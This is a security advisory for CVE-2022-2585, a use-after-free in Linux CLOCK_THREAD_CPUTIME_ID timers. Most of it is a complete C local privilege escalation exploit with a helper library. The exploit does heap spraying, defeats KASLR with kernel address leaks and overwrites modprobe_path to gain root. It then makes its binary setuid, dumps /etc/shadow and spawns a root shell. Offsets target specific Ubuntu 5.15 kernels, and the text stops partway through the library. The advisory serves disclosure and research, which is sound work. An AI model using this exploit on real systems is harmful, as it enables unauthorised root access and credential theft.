SSD Advisory – Linux CLOCK_THREAD_CPUTIME_ID LPE

TL;DR

A vulnerability in the way Linux handles the CLOCK_THREAD_CPUTIME_ID allows local attackers to reach a race condition and use this to elevate their privileges to root.

Vulnerability Summary

A race condition in the way CLOCK_THREAD_CPUTIME_ID works allows local users to double free a pointer allowing them control over the outcome of the second free call and to utilise it to elevate their privileges to root.

Credit

An independent security researcher has reported this to the SSD Secure Disclosure program during the TyphoonPWN 2022 event.

CVE

CVE-2022-2585

Vendor Response

The Linux Kernel team has released a patch to address this vulnerability: https://seclists.org/oss-sec/2022/q3/116

Vulnerability Analysis

The CLOCK_THREAD_CPUTIME_ID bug lies in the posix CPU timer component of Linux kernel.

A CLOCK_THREAD_CPUTIME_ID timer is used for measuring the amount of CPU time consumed by A thread. Once timer_settime is called on this timer, the timer will be “armed”.

Then, the timer will be triggered (by sending the program a signal) after the thread spending a user-specified time interval. This feature is useful if the program want to do something after consuming a specific amount of CPU time in the specific thread.

The way Linux kernel implements this feature is by linking the timer-associated struct k_itimer data structure into a doubly-linked list in struct posix_cputimers. Every time a timer interrupt is raised, a call chain like: check_thread_timers->collect_posix_cputimers->collect_timerqueue will be invoked.

It will check whether the thread has consumed enough time: if yes, the timer will “expire” (triggered) and will be added into a firing linked list. Then, all the timers in the firing linked list will be used, triggering posix_timer_event, which will eventually send signals to the program.

Currently, in the Linux kernel, when a thread creates a thread cpu timer and then calls execve, it will try to clean up all the timers on behalf of the process using exit_itimers(me->signal);. This will free all the timers associated with the process in memory. However, it forgets to clean up the references in struct posix_cputimers.

In other words, if the timer is already armed before execve, the kernel will free the timer mechanism while maintaining a reference to it in the doubly linked timer list. When the time arrives, the kernel will walk through the linked list, find the timer, add it to the `firing` linked list, and try to trigger the timer, which causes a use-after-free situation.

Exploit

define _GNU_SOURCE 

#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <time.h>
#include <fcntl.h>
#include <unistd.h>
#include <assert.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <net/if.h>
#include <netinet/ip.h>
#include <sys/wait.h>
#include <sys/shm.h>
#include <sys/utsname.h>
#include "libexp.h"

#define SPRAY_NUM1 100
#define SPRAY_NUM2 350
#define SPRAY_NUM3 200
#define PIPE_SPRAY_NUM 0x600
#define M_TS_LEN 0x1000
#define LEAK_SPRAY_NUM 0x1000
#define SHM_SPRAY_NUM 0x400
#define PAGE_SPRAY_NUM 0x100

#define def_kbase 0xffffffff81000000
struct config {
	char *release;
	u64 init_ipc_ns;
	u64 modprobe_path;
};

struct config configs[] = {
	{
		.release = "5.15.0-37-generic",
		.init_ipc_ns = 0xffffffff830824c0,
		.modprobe_path = 0xffffffff82e8b560
	},
	{
		.release = "5.15.0-39-generic",
		.init_ipc_ns = 0xffffffff83082580,
		.modprobe_path = 0xffffffff82e8b620
	},
	{
		.release = "5.15.0-40-generic",
		.init_ipc_ns = 0xffffffff83082580,
		.modprobe_path = 0xffffffff82e8b620
	}
};

int fd = 0;
int val = 0;
int *stage = &val;
int shm_fd = -1;
int *shm_stage;
timer_t timerids1[SPRAY_NUM1];
timer_t timerids2[SPRAY_NUM2];
timer_t timerids3[SPRAY_NUM3];
int pipe_fds[PIPE_SPRAY_NUM][2];
u64 kernel_base = 0;
u64 kaslr_slide = 0;
u64 kptr_vtable = 0;
u64 uptr_vtable = 0;
u64 msg_addr = 0;
u64 kbuf_addr = 0;
u64 ubuf_addr = 0;
char path[0x800];
u64 CPUID = 0;
u64 page_size = 0x1000;
char cpuid_env[0x20];
u64 init_ipc_ns = 0;
u64 modprobe_path = 0;

void *trigger_free(void *env_str)
{
	timer_t timerid;
	int ret = timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &timerid);
	assert(ret == 0);

	*stage = 1;
	while(*stage != 2);

	struct timespec tspec = {.tv_sec = 3, .tv_nsec = 0};
	struct itimerspec ispec = { .it_interval = tspec, .it_value = tspec};
	timer_settime(timerid, 0, &ispec, NULL);
	// getchar();

	// fd = memfd_create("exp", 0);
	// assert(fd >= 0);

	char *argv[] = {path, NULL};
	char *env[] = {env_str, cpuid_env, NULL};
	execve(path, argv, env);

	return NULL;
}

void spray_timer(timer_t *tids, u32 num)
{
	for(int i=0; i<num; i++) 
		timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tids[i]);
}

void release_timer(timer_t *tids, u32 num, u32 jump)
{
	for(int i=0; i<num; i+=jump)
		timer_delete(tids[i]);
}

void leak_func()
{
	pthread_t tid;
	ts_fence();
	spray_timer(timerids1, SPRAY_NUM1);
	pthread_create(&tid, NULL, trigger_free, (void *)"LEAK=1");
	while(*stage != 1);
	spray_timer(timerids2, SPRAY_NUM2);
	spray_timer(timerids3, SPRAY_NUM3);

	release_timer(timerids1, SPRAY_NUM1, 1);
	release_timer(timerids2, SPRAY_NUM2, 1);
	release_timer(timerids3, SPRAY_NUM3, 2);

	//puts("Done");
	//int c = getchar();
	//printf("c : %#xn", c);
	//defragment(0x100, 0x1000);

	usleep(100*1000);
	*stage = 2;

	while(1);
}

void exp_func()
{
	pthread_t tid;
	ts_fence();
	spray_timer(timerids1, SPRAY_NUM1);
	pthread_create(&tid, NULL, trigger_free, (void *)"EXP=1");
	while(*stage != 1);
	spray_timer(timerids2, SPRAY_NUM2);
	spray_timer(timerids3, SPRAY_NUM3);

	release_timer(timerids1, SPRAY_NUM1, 1);
	release_timer(timerids2, SPRAY_NUM2, 1);
	release_timer(timerids3, SPRAY_NUM3, 2);

	usleep(100*1000);
	*stage = 2;

	while(1);
}

void leak_child_func()
{
	usleep(1000*100);

	// tell the parent process that the slab page is freed
	*shm_stage = 1;

	// wait for the parent process to reclaim the page
	while(*shm_stage != 2);

	// trigger unlink by exiting the process (in fact, the unlink happens in wait)
	puts("[!] Now trigger unlink in the child process!");
	exit(0);
}

void exp_child_func()
{
	usleep(1000*100);

	// tell the parent process that the slab page is freed
	*shm_stage = 1;

	// cannot sleep here or the timer will not be invoked
	// to avoid waiting CPU time (and increase the critical window), let's move it to another CPU
	set_cpu(CPUID);
	while(1);
}

int search_msgqid()
{
	int msgqid;
	struct msqid_ds ds;
	struct msginfo msginfo;
	int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo);
	assert(maxind >= 0);

	char buffer[0x2000];
	int target_msgqid = -1;

	// printf("check %d msgsn", maxind);

	for(int i=0; i<maxind; i++) {
		int ret;
		msgqid = msgctl(i, MSG_STAT, &ds);
		assert(msgqid >= 0);
		for(int j=0; j<ds.msg_qnum; j++) {
			ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
			assert(ret >= 0);
			if(ret >= 0x1000 && !memcmp(buffer, "AAAAAAAA", 8)) {
				target_msgqid = msgqid;
				// hex_print(buffer, 0x100);
				break;
			}
			msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT);
			if(j == ds.msg_qnum-1) {
				int ret = msgctl(msgqid, IPC_RMID, 0);
				assert(ret == 0);
			}
		}
	}
	return target_msgqid;
}

void increase_limit()
{
	int ret;
	struct rlimit open_file_limit;

	/* Query current soft/hard value */
	ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
	assert(ret >= 0);

	/* Set soft limit to hard limit */
	open_file_limit.rlim_cur = open_file_limit.rlim_max;
	ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
	assert(ret >= 0);
}

u64 leak_kbuf_addr()
{
	timer_t defrag_timers[0x400];
	spray_timer(defrag_timers, 0x400);

	// trigger UAF first
	if(!fork()) {
		set_cpu(CPUID);
		leak_func(); // this function will call execve, so no return
		while(1);
	}

	// wait for the slab page to be freed
	while(*shm_stage != 1);

	// do page spray
	void *addr = umem_alloc(NULL, page_size);
	int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
	*shm_stage = 2;

	// wait for the unlink to happen
	wait(NULL);

	// now we should have the heap leak!
	void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
	assert((u64)addr2 != -1);
	u64 heap_addr = 0;
	int idx = 0;
	while(!heap_addr && idx < 0x10*100) {
		u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
		if(obj_ptr[15] != 0) {
			heap_addr = obj_ptr[15] - 0x78;
			ubuf_addr = (u64)(obj_ptr) & 0xfffffffffffff000;
			break;
		}
		idx += 1;
	}
	if(!heap_addr) {
		puts("[-] leak kbuf_addr failed (but it's OK)");
		// clean up
		munmap(addr2, page_size*PAGE_SPRAY_NUM);
		close(s);
		return 0;
	}
	return heap_addr & 0xfffffffffffff000;
}

u64 leak_msg_addr()
{
	int msgqids[LEAK_SPRAY_NUM];

	// allocate msgq first, it is also in kmalloc-256
	for(int i=0; i<LEAK_SPRAY_NUM; i++) {
		msgqids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
	}
	char buf[0xd0];
	memset(buf, 0, sizeof(buf));
	memset(&buf[0xb0], 'A', 0x20);
	memset(buf, 'A', 8);

	timer_t defrag_timers[0x100];
	spray_timer(defrag_timers, 0x100);

	// trigger UAF first
	if(!fork()) {
		set_cpu(CPUID);
		leak_func(); // this function will call execve, so no return
		while(1);
	}

	// wait for the slab page to be freed
	while(*shm_stage != 1);

	// do page spray
	void *addr = umem_alloc(NULL, page_size);
	int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
	*shm_stage = 2;

	// wait for the unlink to happen
	wait(NULL);

	// now we should have the heap leak!
	void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
	assert((u64)addr2 != -1);
	u64 heap_addr = 0;
	int idx = 0;
	while(!heap_addr && idx < page_size*PAGE_SPRAY_NUM/0x100) {
		u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
		if(obj_ptr[15] != 0) {
			heap_addr = obj_ptr[15] - 0x78;
			break;
		}
		idx += 1;
	}
	if(!heap_addr) {
		puts("[-] leak msg_addr failed (but it's OK)");
		// clean up
		munmap(addr2, page_size*PAGE_SPRAY_NUM);
		close(s);
		return 0;
	}

	// now try to free the page!
	munmap(addr2, page_size*PAGE_SPRAY_NUM);
	close(s);

	for(int i=0; i<LEAK_SPRAY_NUM; i++) {
		for(int j=0; j<4; j++) msgsnd(msgqids[i], buf, sizeof(buf)-8, IPC_NOWAIT);
	}
	return (heap_addr&0xfffffffffffff000) + 0x100;
}

void get_root()
{
	set_cpu(CPUID+1);
	int fd = open("/proc/sys/kernel/modprobe", 0);
	char buf[0x100];
	while(1) {
		lseek(fd, 0, SEEK_SET);
		read(fd, buf, sizeof(buf));
		if(!strncmp(buf, "//tmp/modprobe", 14)) break;
		sleep(1);
	}
	puts("[+] Payload is written! /proc/sys/kernel/modprobe now points to /tmp/modprobe!");
	system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null");
	char *argv[] = {path, NULL};
	char *env[] = {cpuid_env, NULL};
	execve(path, argv, env);
}

void context_setup()
{
	// handle CPUID
	char *id_str = getenv("CPUID");
	if(id_str) CPUID = atoi(id_str);
	else CPUID = cpu_num - 2;
	int ret = sprintf(cpuid_env, "CPUID=%lld", CPUID);
	assert(ret > 0);

	// handle page_size
	if(cpu_num >= 8) page_size = 0x2000;
	else page_size = 0x1000;
}

void prep_shm()
{
	shm_fd = open("/tmp/shm", O_RDWR|O_CREAT, 0666);
	ftruncate(shm_fd, 4);
	shm_stage = (int *)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, shm_fd, 0);
	*shm_stage = 0;
}

void check_root()
{
	// if we are root
	if(open("/etc/shadow", 0) >= 0) {
		setuid(0);
		system("head -n 10 /etc/shadow");
		system("/bin/bash");
		exit(0);
	}

	// or if we can be root
	int tmp_fd = open("/proc/sys/kernel/modprobe", 0);
	char buf[0x2000];
	memset(buf, 0, sizeof(buf));
	read(tmp_fd, buf, sizeof(buf));
	if(!strncmp(buf, "//tmp/modprobe", 14)) {
		sprintf(buf, "echo '#!/bin/bashnchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path);
		system(buf);
		system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null");
		char *argv[] = {path, NULL};
		char *env[] = {cpuid_env, NULL};
		execve(path, argv, env);
	}
}

void setup_offsets(char *release)
{
	for(int i=0; i<sizeof(configs)/sizeof(configs[0]); i++) {
		if(!strcmp(configs[i].release, release)) {
			init_ipc_ns = configs[i].init_ipc_ns;
			modprobe_path = configs[i].modprobe_path;
			break;
		}
	}
	assert(init_ipc_ns != 0);
	assert(modprobe_path != 0);
}

int main(int argc, char **argv)
{
	context_setup();

	set_cpu(CPUID);
	increase_limit();

	// save absolute path for later use
	if(argc && argv[0] && argv[0][0]) assert(realpath(argv[0], path) != NULL);

	// trigger the UAF timer when trying to leak heap address
	if(getenv("LEAK")) {
		set_cpu(CPUID);
		prep_shm();
		leak_child_func();
		exit(0);
	}

	// trigger the UAF timer when trying to perform exploitation
	if(getenv("EXP")) {
		set_cpu(CPUID);
		prep_shm();
		exp_child_func();
		exit(0);
	}

	// in case we already are/can be root
	check_root();

	// first thing first, before we get into a namespace
	// we launch a process that wait for root
	if(!clean_fork()) {
		get_root();
		sleep(10000);
	}

	struct utsname uname_buf;
	assert(uname(&uname_buf) == 0);
	printf("CPUID:      %lldn", CPUID);
	printf("page_size:  %#llxn", page_size);
	printf("release:    %sn", uname_buf.release);

	setup_offsets((char *)&uname_buf.release);

	prep_shm();
	setup_sandbox();
	setup_pg_vec();

	// step 1: leak kbuf_addr
	puts("[*] try to leak kernel buffer addr");
	while(!kbuf_addr) {
		cleanup_msgs();
		usleep(100000);
		kbuf_addr = leak_kbuf_addr();
	}
	printf("[+] kbuf_addr: %#llxn", kbuf_addr);
	printf("[+] ubuf_addr: %#llxn", ubuf_addr);
	assert(kbuf_addr != 0);
	assert(ubuf_addr != 0);
	*(u64 *)ubuf_addr = 0x4141414141414141;

	// reset shm_stage for orchestration
	*shm_stage = 0;

	// step 2: leak msg_msg addr
	puts("[*] try to leak msg_msg addr");
	while(!msg_addr) {
		cleanup_msgs();
		usleep(100000);
		msg_addr = leak_msg_addr();
	}
	printf("[+] msg_msg addr: %#llxn", msg_addr);
	assert(msg_addr != 0);

	// reset shm_stage for orchestration
	*shm_stage = 0;
	// step 2: trigger the vulnerability again and reclaim the page
	// trigger UAF
	if(!fork()) {
		set_cpu(CPUID);
		exp_func(); // this function will call execve, so no return
		while(1);
	}

	// wait for the slab page to be freed
	while(*shm_stage != 1);

	// do page spray, the payload is used for trapping CPU0 to an infinite loop so we can
	// later modify the memory in CPU1
	void *addr = umem_alloc(NULL, page_size);
	*(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120;
	for(int i=0; i<page_size/0x100; i++) {
		u64 *obj_ptr = (u64 *)(addr-0x40+-2+i*0x100);
		obj_ptr[10] = M_TS_LEN; // timer->it_requeue_pending
		obj_ptr[11] = 0x000000012a05f200;
		obj_ptr[14] = msg_addr-0x20; // timer->sigq
		obj_ptr[16] = kbuf_addr + 0x120;
		obj_ptr[17] = kbuf_addr + 0x100;
		obj_ptr[18] = 0x000000012a061742;
		obj_ptr[19] = kbuf_addr; // head
	}
	int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
	*shm_stage = 2;

	// now, wait for the timer to get triggered.
	// when it is triggered, timer->firing will become 1, then we know where is the timer
	// in the buffer and the CPU0 is halted
	set_cpu(CPUID+1); // switch to CPU1 because CPU0 will hang
	void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
	u64 *timer_ptr = NULL;
	while(!timer_ptr) {
		int idx = 0;
		while(idx < page_size*PAGE_SPRAY_NUM/0x100) {
			u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
			// if(idx % 0x10==0)printf("a: %pn", obj_ptr);
			if(obj_ptr[23] == 1) {// tmr.firing == 1
				timer_ptr = obj_ptr;
				break;
			}
			idx++;
		}
	}

	// now we know tmr->firing is set, CPU0 is going to be trapped very soon
	// let's waste a few cycles to ensure that
	read(-1, NULL, 0);

	// now we are sure CPU0 is trapped =>
	// 1. clear out the timer's first part to avoid locking issues
	// 2. modify the timer so it won't be added to the firing list again immediately, but will be triggered in 2 seconds
	// 3. release CPU0 by making it think it reaches a leaf node
	memset(timer_ptr, 0, 0x50);
	timer_ptr[18] = 0x000000012a061742*2;
	*(u64 *)(ubuf_addr + 0x130) = 0;

	// now we are back to CPU0!	so we spray in the per-CPU cache!
	set_cpu(CPUID);
	printf("[+] timer_ptr: %pn", timer_ptr);

	// at this moment, we have a msg_msg with an enlarged m_ts, let's find it!
	puts("[*] Looking for the victim msg_msg...");
	int msgqid = search_msgqid();
	assert(msgqid >= 0);
	printf("[+] Found it! msgqid: %dn", msgqid);

	// alright, let's spray tons of shmid to leak kaslr
	int shmids[SHM_SPRAY_NUM];
	char buffer[0x2000];
	memset(buffer, 0, sizeof(buffer));
	for(int i=0; i<SHM_SPRAY_NUM; i++) shmids[i] = shmget(IPC_PRIVATE, 1, 0600);
	int ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
	assert(ret >= 0);
	// search for shmid, we can't be unluckly enough that there is no shmid_kernel in the PAGE?
	for(int i=0; i<(page_size/0x100)-2; i++) {
		u64 *obj_ptr = (u64 *)(buffer + 0xd0 + i*0x100);
		u64 val = obj_ptr[29]; // shmid_kernel->ns, should be init_ipc_ns
		if(((val-init_ipc_ns) & 0xfff) == 0) {
			kaslr_slide = val - init_ipc_ns;
			kernel_base = kaslr_slide + def_kbase;
			break;
		}
	}
	printf("[+] kernel_base: %#llxn", kernel_base);
	printf("[+] kaslr_slide: %#llxn", kaslr_slide);
	if(kernel_base == 0) {
		hex_print(buffer, sizeof(buffer));
		timer_ptr[18] = 0xffffffffffff;// disarm timer to avoid crash
		getchar();
		exit(0);
	}
	assert(kernel_base != 0);

	// now we have KASLR leak and the timer will be triggered again in a few seconds
	// let's prepare the timer
	*(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120;
	timer_ptr[10] = 0x706d742f-1; // timer->it_requeue_pending => /tmp
	timer_ptr[11] = 0x000000012a05f200;
	timer_ptr[14] = kaslr_slide + modprobe_path - 0x38 + 1; // overwrirte modprobe_path+1 with /tmp => /sbin/modprobe becomes //tmp/modprobe
	timer_ptr[15] = 0;
	timer_ptr[16] = kbuf_addr + 0x120;
	timer_ptr[17] = kbuf_addr + 0x100;
	timer_ptr[18] = 0x000000012a061742*2;
	timer_ptr[19] = kbuf_addr; // head

	// switch to CPU1 again because we know CPU0 will be trapped again in a few seconds
	set_cpu(CPUID+1);

	// now wait CPU0 to get trapped
	timer_ptr[23] = 0; // tmr->firing = 0
	while(!timer_ptr[23]); // wait for firing to be set
	read(-1, NULL, 0); // waste a few cycles to ensure CPU0 is trapped

	// 1. make sure the timer will not be triggered again by setting a huge expire value
	// 2. resume its execution, write a heap pointer before modprobe_path so that send_sigqueue will not panic
	timer_ptr[18] = 0xffffffffffff;
	*(u64 *)(ubuf_addr + 0x130) = kaslr_slide + modprobe_path - 0x30 - 6; 

	// prepare payload
	puts("[*] Waiting for payload to be written into '/proc/sys/kernel/modprobe'...");
	sprintf(buffer, "echo '#!/bin/bashnchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path);
	system(buffer);
	// now wait for the get_root subprocess to wake up and launch a root shell
	wait(NULL);

	return 0;
}
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdarg.h>
#include <sched.h>
#include <time.h>
#include <poll.h>
#include <signal.h>
#include <keyutils.h>
#include <pthread.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <arpa/inet.h>
#include <x86intrin.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/ip.h>

#include "libexp.h"

struct fault_struct {
	int uffd;
	struct fault_struct *next;
	void *addr;
	size_t len;
	void *src_page;
	void (*hook)(void *);
};

static u64 min_cpu_freq;
static u64 min_granularity;
static u64 min_slice_tsc;
static u64 msgmnb;
static u64 mem_size;
static u64 optmem_max;
static int urand_fd;
u64 cpu_num;
struct cpu_info *idle_cpus;
cpu_set_t cpu_mask;
size_t kmalloc_size_array[13] = {0x8, 0x10, 0x20, 0x40, 0x60, 0x80, 0xc0, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000};

#define DEBUG 0
#define dprintf(...) if(DEBUG) printf(__VA_ARGS__)
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_MIN 0

#define CPU_FREQ_FILE "/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq"
#define SCHED_GRAN_FILE "/proc/sys/kernel/sched_min_granularity_ns"
#define MSGMNB_FILE "/proc/sys/kernel/msgmnb"
#define CPU_INFO_FILE "/proc/cpuinfo"
#define MEM_INFO_FILE "/proc/meminfo"
#define OPTMEM_MAX_FILE "/proc/sys/net/core/optmem_max"
#define SCHED_DEBUG_FILE "/proc/sched_debug"
#define SUPPRESS_PROC_NUM 20
#define UNIV_SPRAY_FILE "/tmp/univ_spray_dummy"

void rand_str(char *dest, size_t length)
{
	char charset[] = "0123456789"
	                 "abcdefghijklmnopqrstuvwxyz"
	                 "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	read(urand_fd, dest, length);
	for(int i=0; i<length; i++) {
		int idx = ((int)dest[i]) % (sizeof(charset)/sizeof(char) - 1);
		dest[i] = charset[idx];
	}
	dest[length] = '';
}

void hex_print(void *addr, size_t len)
{
	u64 tmp_addr = (u64)addr;
	puts("");
	for(u64 tmp_addr=(u64)addr; tmp_addr < (u64)addr + len; tmp_addr += 0x10) {
		printf("0x%016llx: 0x%016llx 0x%016llxn", tmp_addr, *(u64 *)tmp_addr, *(u64 *)(tmp_addr+8));
	}
}

void error_out(const char *fmt, ...)
{
	char *buf;
	va_list ap;

	va_start(ap, fmt);
	if(vasprintf(&buf, fmt, ap) < 0) {
		perror("[error_out]");
		exit(-1);
	}
	va_end(ap);

	puts(buf);
	perror("[Reason] ");
	exit(-1);
}

static u64 _read_u64_from_file(const char *fname)
{
	FILE *f = fopen(fname, "r");
	long size = 0x100;
	char *buf = alloca(size+1);

	// read content
	if(f == NULL) error_out("fail to open %s", fname);
	if(fread(buf, 1, size, f) <= 0) error_out("fail to fread on %s", fname);
	buf[size] = 0;
	fclose(f);

	return atoll(buf);
}

static size_t kmalloc_size(size_t num)
{
	for(int i=0; i<sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]); i++) {
		size_t size = kmalloc_size_array[i];
		if(size > num) return size;
	}
	error_out("%ld is too large to fit in kmalloc", num);
}

static u64 _get_cpu_freq(void)
{
	// try to read from u64 first
	if(access(CPU_FREQ_FILE, R_OK) == 0)
		return _read_u64_from_file(CPU_FREQ_FILE);

	// try to read from /proc/cpuinfo
	if(access(CPU_INFO_FILE, R_OK) == 0) {
		FILE *f = fopen(CPU_INFO_FILE, "r");
		char *line_buf = NULL;
		char *freq_buf;
		size_t n;

		// look for cpu MHz
		while(!feof(f)) {
			if(getline(&line_buf, &n, f) < 0) {
				free(line_buf);
				goto out;
			}
			if(strstr(line_buf, "cpu MHz")) break;
		}

		freq_buf = strstr(line_buf, ":");
		freq_buf += 1;
		double freq = atof(freq_buf) * 1000;// MHz to KHz
		return (u64)freq;
	}

out:
	error_out("fail to get cpu frequency");
	return -1;
}

static u64 _get_min_gran(void)
{
	// try to read from file first
	if(access(SCHED_GRAN_FILE, R_OK) == 0)
		return _read_u64_from_file(SCHED_GRAN_FILE);

	// return a commonly used default value
	return 3000000;
}

static u64 _get_cpu_num(void)
{
	return sysconf(_SC_NPROCESSORS_ONLN);
}

static u64 _get_mem_size(void)
{
	FILE *f = fopen(MEM_INFO_FILE, "r");
	char *line_buf = NULL;
	char *buf;
	size_t n;

	if(unlikely(f == NULL)) error_out("fail to open /proc/meminfo");

	if(getline(&line_buf, &n, f) < 0) {
		free(line_buf);
		goto out;
	}
	buf = strstr(line_buf, ":") + 1;
	fclose(f);
	return atoll(buf) * 1024;

out:
	error_out("fail to read memory size");
	fclose(f);
	return -1;
}

static void busy_loop(void)
{
	while(1);
}

pid_t clean_fork(void)
{
	pid_t pid = fork();
	if(pid) return pid;

	if(prctl(PR_SET_PDEATHSIG, SIGKILL) < 0) error_out("fail to register DEATHSIG");
	return pid;
}

void anti_swapper(void (*hook)(void))
{
	for(int i=0; i<cpu_num; i++) {
		if(!clean_fork()) {
			set_cpu(i);
			if(hook) hook();
			busy_loop();
		}
	}
}

void suppress_int(void (*hook)(void))
{
	for(int i=0; i<cpu_num; i++) {
		// for each core spawn SUPPRESS_PROC_NUM dummy process
		for(int j=0; j<SUPPRESS_PROC_NUM; j++) {
			if(!clean_fork()) {
				set_cpu(i);
				if(hook) hook();
				busy_loop();
			}
		}
	}
}

void ts_fence(void)
{
	cpu_set_t my_set;

	// Step1: get current affinity mask
	if(sched_getaffinity(0, sizeof(my_set), &my_set)) error_out("fail to get cpu affinity");

	// Step2: pin CPU to current CPU to avoid task migration and get wrong tsc
	set_cpu(sched_getcpu());

	// Step3: do context switch detection
	register u64 start = __rdtsc();
	register u64 prev = start;
	register u64 now = start;
	while(1) {
		now = __rdtsc();
		if(unlikely(now - prev > min_slice_tsc)) break;
		if(unlikely(now - start > 5*min_slice_tsc)) {
			// puts("[Info] Have been waiting for a reschedule for too long, gonna yield and hope next time we get a new time slice");
			sched_yield();
			break;
		}
		prev = now;
	}

	// Step4: restore affinity mask
	if(sched_setaffinity(0, sizeof(my_set), &my_set)) error_out("fail to set cpu affinity");
}

void set_cpu(int cpuid)
{
	cpu_set_t my_set;
	CPU_ZERO(&my_set);
	CPU_SET(cpuid, &my_set);
	if(sched_setaffinity(0, sizeof(my_set), &my_set) != 0)
		error_out("set cpu affinity at cpu: %d fails", cpuid);
}

void unset_cpu(void)
{
	if(unlikely(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_mask) != 0))
		error_out("fail to unset cpu affinity");
}

int write_file(const char* fname, const char* fmt, ...)
{
	char buf[1024];
	va_list args;

	va_start(args, fmt);
	vsnprintf(buf, sizeof(buf)-1, fmt, args);
	va_end(args);
	buf[sizeof(buf)-1] = 0;

	int len = strlen(buf);
	int fd = open(fname, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return -1;
	if (write(fd, buf, len) != len) {
		close(fd);
		return -1;
	}
	close(fd);
	return 0;
}


void setup_sandbox(void)
{
	int real_uid = getuid();
	int real_gid = getgid();

	if (unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS) != 0)
		error_out("unshare fails");
	if (write_file("/proc/self/setgroups", "deny") < 0)
		error_out("write_file(/proc/self/set_groups) fails");
	if (write_file("/proc/self/uid_map", "0 %d 1n", real_uid) < 0)
		error_out("write_file(/proc/self/uid_map) fails");
	if (write_file("/proc/self/gid_map", "0 %d 1n", real_gid) < 0)
		error_out("write_file(/proc/self/gid_map) fails");
}

void *umem_alloc(void *addr, size_t size)
{
	void *ret;
	int flags = MAP_SHARED | MAP_ANON;
	if (addr) flags |= MAP_FIXED;
	ret = mmap(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0);
	if(addr && ret != addr) error_out("[-] umem_alloc fails to mmap the fixed address %p", addr);
	if(!addr && !ret) error_out("[-] umem_alloc fails to mmap NULL");
	return ret;
}

/* use add_key for defragment
* add_key will allocate 5 objects in one call when the key is added for the first time
* and 4 objects afterwards
* 1. strlen(desc) and get freed eventually
* 2. plen caused by kvmalloc and get freed eventually
* 3. (struct user_key_payload) + plen, sizeof(payload)+0x18
* 4. sizeof(struct assoc_array_edit) in size of 328 (0x148), and freed if not the first time
* (5). sometimes allocate (struct assoc_array_node) twice 0x98/152
* 6. struct key, size of 0x100 -> through special cache not kmalloc
* 7. sizeof(desc), caused by kmemdup
*/
// here we use the desc method
void defragment_add_key(size_t size, u32 num)
{
	char type[] = "user";
	char *desc = alloca(size+1);
	char payload[1];

	if(num > 195) puts("num too large, defragmentation is likely to fail");

	memset(desc, 0, size+1);
	payload[0] = 'A';

	for(int i=0; i<num; i++) {
		key_serial_t key;
		rand_str(desc, size-1);
		key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
		if(key < 0) error_out("add_key failed at idx %d", i);
	}
}

void add_key_spray_num(void *payload, size_t size, u32 num)
{
	char type[] = "user";
	char desc[0x10];

	memset(desc, 0, sizeof(desc));

	for(int i=0; i<num; i++) {
		key_serial_t key;
		rand_str(desc, sizeof(desc)-1);
		key = add_key(type, desc, payload, size, KEY_SPEC_THREAD_KEYRING);
		if(key < 0) error_out("add_key failed at idx %d", i);
	}
}

// max length: 4096
void add_key_desc_spray_num(char *desc, u32 num)
{
	char type[] = "user";
	size_t size = strlen(desc);
	size_t ksize = kmalloc_size(size);
	char payload[1];

	if(num > 195) puts("num too large, defragmentation is likely to fail");
	if(ksize <= size) error_out("size too large, it should be smaller than next kmalloc size");
